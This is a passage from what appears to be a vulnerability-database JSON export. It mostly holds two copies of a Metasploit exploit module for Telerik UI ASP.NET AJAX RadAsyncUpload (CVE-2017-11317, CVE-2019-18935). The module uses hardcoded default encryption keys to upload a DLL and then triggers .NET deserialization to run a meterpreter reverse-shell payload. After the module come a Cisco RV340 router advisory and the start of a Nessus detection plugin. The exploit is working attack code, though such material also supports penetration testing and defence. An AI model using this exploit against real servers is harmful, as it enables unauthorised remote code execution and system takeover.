ASP.NET that is running.\n This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || \"#{Rex::Text.rand_text_alphanumeric(rand(4..35))}.dll\"\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document['metaData']).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"#{encrypt(serialized_object.to_json.encode('UTF-16LE'))}&#{encrypt(serialized_object_type.encode('UTF-16LE'))}\", nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-20T20:37:38", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? \nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} \nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') \nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt"}, {"lastseen": "2019-02-10T19:00:54", "description": "", "cvss3": {}, "published": "2019-02-08T00:00:00", "type": "packetstorm", "title": "SAMSUNG X7400GX Sync Thru Web Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-7421", "CVE-2019-7419", "CVE-2019-7420", "CVE-2019-7418"], "modified": "2019-02-08T00:00:00", "id": "PACKETSTORM:151584", "href": "https://packetstormsecurity.com/files/151584/SAMSUNG-X7400GX-Sync-Thru-Web-Cross-Site-Scripting.html", "sourceData": "` \n \n \n \n \n \n \n \n \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151584/samsungx7400gx-xss.txt"}], "cisco": [{"lastseen": "2023-06-24T08:28:14", "description": "Multiple vulnerabilities in the web-based management interface of the Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an attacker to do the following:\n\nExecute arbitrary code\nCause a denial of service (DoS) condition\nExecute arbitrary commands\n\nFor more information about these vulnerabilities, see the Details [\"#details\"] section of this advisory.\n\nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy\"]", "cvss3": {}, "published": "2021-08-04T16:00:00", "type": "cisco", "title": "Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Web Management Vulnerabilities", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-1609", "CVE-2021-1610"], "modified": "2021-08-04T16:00:00", "id": "CISCO-SA-RV340-CMDINJ-RCEDOS-PY8J3QFY", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy", "cvss": {"score": 9.8, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}}], "nessus": [{"lastseen": "2023-09-18T15:16:32", "description": "According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple vulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device or cause the device to reload, resulting in a denial of service (DoS) condition. (CVE-2021-1609)\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary commands with root privileges on an affected device. (CVE-2021-1610)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-08-04T00:00:00", "type": "nessus", "title": "Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Multiple Vulnerabilities (cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1609", "CVE-2021-1610"], "modified": "2022-12-05T00:00:00", "cpe": ["x-cpe:/o:cisco:small_business_rv_series_router_firmware", "cpe:/o:cisco:rv340_firmware", "cpe:/o:cisco:rv340w_firmware", "cpe:/o:cisco:rv345_firmware", "cpe:/o:cisco:rv345p_firmware", "cpe:/h:cisco:rv340", "cpe:/h:cisco:rv340w", "cpe:/h:cisco:rv345", "cpe:/h:cisco:rv345p"], "id": "CISCO-SA-RV340-CMDINJ-RCEDOS-PY8J3QFY.NASL", "href": "https://www.tenable.com/plugins/nessus/152212", "sourceData": "#TRUSTED 9859b74b70ec73ebec0428e2ef97b177c8c55619807b9ea56b7cfeb0172245558c97a1b60ffc1ff9c2b5c4681665949a39d0aa20968ce963932a71d0051fefbcae6cfb3655a2d91edba7c6afae95bf74b56d126a05ffd901ca41b663ac948852017f60220e63b2a70c31e3d8c7a37e5800d5dc483c4b7bdd998dd200ee6406f7fa97f06d88c0cacb33dc45042aa39fc5f58241ec4a52ec121df20f68f133588e2860407377dff54a25ed5291a3325626c05b2745b65c62c773aab0992276c73835bc255716cda19ca9fdf0587569014d776e5a4c8dcf1312765a19914b94db6e79dbe2b288a5b10dffb859a48cc010a8dac129a944205928dd4834ce45c742701d337fcee2ed91c8eef2145680c85f357bde273603337506e6ad7b5876f4efce6fd05e4bb6aca5639582efda5063cfa2c5bb10e24f5c85d490ea6b1b34145295785c3c2edfaef8f767abed7318d0e36a4991dcbcae1097ad9ed7aa64e1a2b304d52f0faeed267deb7bb3ad95a5a1e7c0644fcdd76c60ea7708f2ea2955b77e6462ff6164eb461fe2e603300f1239a57650924ff1df2093f8a32e1912c072b40cbbbbc26cf59187392b82bf49125928b164edb6825842cd6069ec9580e621969f4d2fb052fdd3406c1058824140311804dcde4ed76a375afb78ac2675ff20b734b168e85acdc2b6981a2c70982012fb00b3591fe2c53925e07a6e584ad6bb911a\n#TRUST-RSA-SHA256 662a54be34a7450028d0a7725c47682bf216dcfebe02b1af47dea07cf454a1f454b241a6a59b040b12b713bc4b03b48ca5ba081f4a78b94cd8ed0f9e644d8c6d6a092e89adeca9a80f8faa8112473e2e0245ca5bcfc1346847c491237487dc79033cfb938d165f2b719831ca2fe84d164274ddb9ae1959a155d19403d0663bf854e963ca9a36a86f2394d26e98ea4278079c1287b9f15780e50243bf5372d9cc36d180a4750808504a2342ec5ee71c761ee08501e61945fe9749eda37750e6c572dd9871970adeab876e946d117fe4d893ca14c9cca299662128da99d4ad79c1cd757dc175b878394b529fc3ca2b9af7c10e4bb382637175c4b71204e6f3ee1bfb642e92a99435dd936d5542d0df3ab989b2c32fb0e68b4623c45e9071f11d6ad059d0642ba80bc5953e7cc71a889c2d323eddc312f91c537f9d372356ff1a663e315cb685598f4de4d45a0a40bb2ba7df14a0b54ef82eb9cd3cc232c46a83de747371410b1c0e05e8ccbf90fc95b191f5a889d8195b3f9b94de3cae235e07b86003a3dce35186e26861fda529abd34ad13b2f8b4cd5f098bb124583a5b56b4aea1c0f8af91f5fd3adf7c7a99816af7545c49f8e17858f92c2a6c842e7f8c819e1c68d2f04c582c22a3e47a4c71240a3539f90b4a7a52e2575e7256559c95fa0b5569aff4f4127dda7ef36d99afd85a8831c38cfeb826bdbfb09fe8bd61e6ee9\n#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152212);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-1609\", \"CVE-2021-1610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvy15286\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvy15342\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy\");\n script_xref(name:\"IAVA\", value:\"2021-A-0360\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0038\");\n\n script_name(english:\"Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Multiple Vulnerabilities (cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch (cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy)\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, Cisco Small Business RV Series Router Firmware is affected by multiple\nvulnerabilities:\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual\n WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to execute arbitrary code on an affected\n device or cause the device to reload, resulting in a denial of service (DoS) condition. (CVE-2021-1609)\n\n - A vulnerability in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual\n WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary commands with root\n privileges on an affected device. (CVE-2021-1610)\n\nPlease see the included Cisco BIDs and Cisco Security Advisory for more information.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv340-cmdinj-rcedos-pY8J3qfy\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b5b4035e\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvy15286\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvy15342\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug IDs CSCvy15286, CSCvy15342\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-1609\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 